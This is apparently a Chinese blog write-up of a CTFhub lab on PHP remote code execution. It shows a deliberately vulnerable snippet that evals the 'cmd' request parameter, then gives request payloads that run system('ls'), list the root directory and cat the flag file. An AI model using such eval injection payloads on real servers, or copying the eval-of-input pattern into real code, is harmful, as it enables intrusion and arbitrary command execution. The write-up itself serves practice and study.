CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
爱上妖精的尾巴8 分钟前
8-8 WPS JS宏 正则表达式 字符组与任选
java·服务器·前端
一嘴一个橘子18 分钟前
mybatis-plus 基于 service 接口的 crud
java
山岚的运维笔记23 分钟前
SQL Server笔记 -- 第34章:cross apply
服务器·前端·数据库·笔记·sql·microsoft·sqlserver
前端程序猿i1 小时前
第 8 篇:Markdown 渲染引擎 —— 从流式解析到安全输出
开发语言·前端·javascript·vue.js·安全
Java小卷1 小时前
KIE Drools 10.x 规则引擎快速入门
java·后端
coding随想1 小时前
告别构建焦虑!用 Shoelace 打造零配置的现代 Web 应用
前端
fengsen52113141 小时前
Windows操作系统部署Tomcat详细讲解
java·windows·tomcat
竟未曾年少轻狂1 小时前
Spring Boot 项目集成 Redis
java·spring boot·redis·缓存·消息队列·wpf·redis集群
css趣多多1 小时前
resize.js
前端·javascript·vue.js
_codemonster1 小时前
java web修改了文件和新建了文件需要注意的问题
java·开发语言·前端
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03243 行 microGPT:把“训练 + 推理”拆到骨头里04openclaw配置教程(linux+局域网ollama)05UV安装并设置国内源06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07Zsh/Bash Conda设置延迟启动,启动速度优化08Palantir官方深度解析本体 Ontology系统及知识图谱、大模型:企业自主决策的核心AI引擎09【2026年新版】Python根据小红书关键词爬取所有笔记数据10openclaw 配置飞书 报错 应用未建立长连接